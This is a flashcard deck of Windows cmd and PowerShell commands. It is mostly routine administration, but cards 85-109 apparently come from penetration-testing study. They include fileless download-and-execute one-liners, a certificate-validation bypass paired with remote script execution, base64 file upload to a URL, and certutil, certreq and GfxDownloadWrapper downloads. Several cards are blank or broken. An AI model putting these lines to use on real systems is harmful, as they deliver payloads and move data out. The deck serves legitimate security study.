Useful powershell commands (and cmd) Flashcards
must learn these!
1
Q
How to convert from base64 powershell?
A
2
Q
Show system information
A
systeminfo
3
Q
List all running processes
A
tasklist
4
Q
Kill a process by name
A
taskkill /IM [process_name] /F
5
Q
Kill a process by PID
A
taskkill /PID [pid] /F
6
Q
Clear the command prompt screen
A
cls
7
Q
List files in a directory
A
dir
8
Q
Change directory
A
cd [directory]
9
Q
Create a new directory
A
mkdir [directory]
10
Q
Remove a directory
A
rmdir /S /Q [directory]
11
Q
Copy a file
A
copy [source] [destination]
12
Q
Move or rename a file
A
move [source] [destination]
13
Q
Delete a file (cmd)
A
del [file_name]
14
Q
Show IP configuration
A
ipconfig /all
15
Q
Release IP address
A
ipconfig /release
16
Q
Renew IP address
A
ipconfig /renew
17
Q
Flush DNS cache
A
ipconfig /flushdns
18
Q
Display active network connections
A
netstat -an
19
Q
Display listening ports
A
netstat -an | find “LISTEN”
20
Q
Ping a host
A
ping [hostname_or_ip]
21
Q
Trace route to a host
A
tracert [hostname_or_ip]
22
Q
Check open ports on a remote host (cmd)
A
telnet [hostname_or_ip] [port]
23
Q
Shutdown the computer
A
shutdown /s /t 0
24
Q
Restart the computer
A
shutdown /r /t 0
25
Log off current user
shutdown /l
26
Check disk usage
chkdsk
27
Check and repair disk errors
chkdsk /f
28
Show available disk space
wmic logicaldisk get size,freespace,caption
29
List installed programs
wmic product get name
30
Find specific installed program
wmic product where "name like '%[program_name]%'" get name
31
Create a new user
net user [username] [password] /add
32
Delete a user
net user [username] /delete
33
Add user to a group
net localgroup [groupname] [username] /add
34
Remove user from a group
net localgroup [groupname]
[username] /delete
35
List all users
net user
36
List all groups
net localgroup
37
Enable remote desktop
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
38
Disable remote desktop
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
39
Start a service (cmd)
net start [service_name]
40
Stop a service
net stop [service_name]
41
List all services
sc query
42
Check service status (cmd)
sc query [service_name]
43
Enable a service
sc config [service_name] start= auto
44
Disable a service (cmd)
sc config [service_name] start= disabled
45
List all environment variables
set
46
Set an environment variable
setx [variable_name] [value] /M
47
Delete an environment variable
setx [variable_name] "" /M
48
Get current date (cmd)
echo %DATE%
49
Get current time
echo %TIME%
50
Find a string in a file
findstr "pattern" [file_name]
51
Create a compressed zip file (powershell)
Compress-Archive -Path [file_name] -DestinationPath [output.zip]
52
Extract a zip file
Expand-Archive -Path [input.zip] -DestinationPath [directory]
53
Get running processes (PowerShell)
Get-Process
54
Kill a process (PowerShell)
Stop-Process -Name [process_name] -Force
55
Get system uptime (PowerShell)
(get-date) - (gcim Win32_OperatingSystem).LastBootUpTime
56
Get system information (PowerShell)
Get-ComputerInfo
57
List installed software (PowerShell)
Get-WmiObject -Query "SELECT * FROM Win32_Product"
58
Check Windows version (PowerShell)
“[System.Environment]::OSVersion”
59
Restart a service (PowerShell)
Restart-Service -Name [service_name]
60
List network adapters (PowerShell)
Get-NetAdapter
61
Disable network adapter (PowerShell)
Disable-NetAdapter -Name "[adapter_name]”
62
Enable network adapter (PowerShell)
Enable-NetAdapter -Name "[adapter_name]"
63
Get IP configuration (PowerShell)
Get-NetIPConfiguration
64
Get firewall rules (PowerShell)
Get-NetFirewallRule
65
Enable firewall rule (PowerShell)
Enable-NetFirewallRule -DisplayName "[rule_name]"
66
Disable firewall rule (PowerShell)
Disable-NetFirewallRule -DisplayName "[rule_name]"
67
Check open ports (PowerShell)
Test-NetConnection -ComputerName [hostname_or_ip] -Port [port]
68
Ping a host (PowerShell)
Test-Connection -ComputerName
69
List active TCP connections (PowerShell)
Get-NetTCPConnection
70
Restart computer (PowerShell)
Restart-Computer -Force
71
Shutdown computer (PowerShell)
Stop-Computer -Force
72
Get available storage (PowerShell)
Get-PSDrive -PSProvider FileSystem
73
Check disk health (PowerShell)
Get-PhysicalDisk
74
Format a disk (PowerShell)
Format-Volume -DriveLetter [drive_letter] -FileSystem NTFS -NewFileSystemLabel "NewLabel"
75
List running services (PowerShell)
Get-Service
76
Start a service (PowerShell)
Start-Service -Name [service_name]
77
Stop a service (PowerShell)
Stop-Service -Name [service_name]
78
Set execution policy (PowerShell)
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
79
Run a script as administrator (PowerShell)
Start-Process PowerShell -Verb RunAs -ArgumentList "-File [script.ps1]"
80
List scheduled tasks (PowerShell)
Get-ScheduledTask
81
Get system logs (PowerShell)
Get-EventLog -LogName System -Newest 10
82
Export event logs to a file (PowerShell)
wevtutil epl System C:\Logs\system.evtx /ow:true
83
Get information about an AD Domain
Get-ADDomain
84
See what groups you're in
whoami /groups
85
How to download http powershell? 1
(New-Object Net.WebClient).DownloadFile('[Target File URL]','[Output File Name]')
86
Fileless download execution powershell? 1
(New-Object Net.WebClient).DownloadString('[url]') | IEX
87
How to download http powershell? 2
Invoke-WebRequest [url] -OutFile [out_file]
88
Fileless download powershell? 2
Invoke-WebRequest [url] -UseBasicParsing | IEX
89
https download untrusted certificate bypass powershell?
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} && IEX(New-Object Net.WebClient).DownloadString('[url]')
90
http upload powershell? 1
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') && Invoke-FileUpload -Uri [url] -File [file]
91
http upload powershell? 2
b64 = [System.convert]::ToBase64String((Get-Content -Path '[file]' -Encoding Byte)) && Invoke-WebRequest -Uri [url] -Method POST -Body $b64
92
How to list the contents of a share? 1
dir \\\\[ip]\share
93
How to copy a file from a share?
copy \\[host]\[file]
94
Map smb share to drive?
net use n: \\[\\ip]\\\[share]
95
Map smb share to drive with auth?
net use n: \\[ip]\[share] /user:[username] [password]
96
List total number of files in a share after mapped?
dir [drive]: /a-d /s /b | find /c ":\"
97
How to search for file names with dir?
dir n:\*[name]* /s /b
98
How to map smb share to drive powershell?
New-PSDrive -Name "N" -Root "\\[hostname]\[share]" -PSProvider "FileSystem"
99
How to create PSCredential object?
$secpassword = ConvertTo-SecureString [pass] -AsPlainText -Force &&
$cred = New-Object System.Management.Automation.PSCredential [user] $secpassword
100
How to count the number of files in a share powershell?
cd [drive]: && (Get-ChildItem -File -Recurse | Measure-Object).Count
101
How to start a powershell remote session?
$Session = New-PSSession -ComputerName [hostname]
102
How to upload a file to a remote powershell session?
Copy-Item -Path [file] -ToSession $Session -Destination [out_file]
103
How to download a file from a remote powershell session?
Copy-Item -Path [file] -Destination [file] -FromSession $Session
104
How to access an rdp mounted filesystem?
dir \\tsclient\
105
How to encrypt a file powershell?
Invoke-AESEncryption -Mode Encrypt -Key [encryption_key] -Path [outfile]
106
How to POST a file with certreq.exe?
certreq.exe -Post -config [url]
107
How to download http with BITSadmin powershell?
Import-Module bitstransfer; Start-BitsTransfer -Source [url] -Destination [path]
108
How to download with certutil http?
certutil.exe -verifyctl -split -f http://:/
109
How to download http with GfxDownloadWrapper.exe?
GfxDownloadWrapper.exe [url] [path]
110
How to open diskmanagement?
win + r "diskmgmt.msc"
111
How to connect to a remote MSSQL database via commandline?
sqsh -S [ip] -U [user] -P [pass]
112
How to connect to mysql database via commandline?
mysql.exe -u [username] -p[password]-h [ip]
113
How to find an AD user by name powershell?
Get-ADUser -Filter "Name -eq [name]" -Properties *
114
How to remove an AD user powershell?
Remove-ADUser -Identity [SamAccountName]
115
How to add an AD User powershell?
Add-ADUser (-FullName ..., -SamAccountName..., -DisplayName..., -Password.., ect.)
116
How to unlock an AD account powershell?
Unlock-ADAccount [SamAccountName]
117
How to reset the password for an AD account powershell?
Set-ADAccountPassword -Identity [SamAccountName] -Reset -NewPassword (ConvertTo-SecureString -AsPlainText [password] -Force)
118
How to set an AD Account to create a new password at next logon powershell?
Set-ADUser -Identity [SamAccountName] -ChangePasswordAtLogon $true
119
How to copy a GPO powershell?
Copy-GPO -SourceName [GPO-to-copy] -TargetName [copied GPO name]
120
How to link a GPO to an OU powershell?
New-GPLink -Name [GPO name] -Target [OU name] -LinkEnabled Yes
121
What command is used to domain-join a local computer powershell?
Add-Computer -DomainName [domain name] -Credential INLANEFREIGHT\[admin uname] -Restart
122
What command is used to domain join a remote computer powershell?
Add-Computer -ComputerName [hostname] -LocalCredential [local admin uname] -DomainName [domain name] -Credential [domain admin uname] -Restart
123
How to find the OU membership of a computer powershell?
Get-ADComputer -Identity [hostname] -Properties * | select CN,CanonicalName,IPv4Address
124
How to check if a computer is domain joined?
systeminfo | findstr /B "Domain"
(or check in settings)
125
Which command output details the required and available security properties of a computer?
systeminfo
126
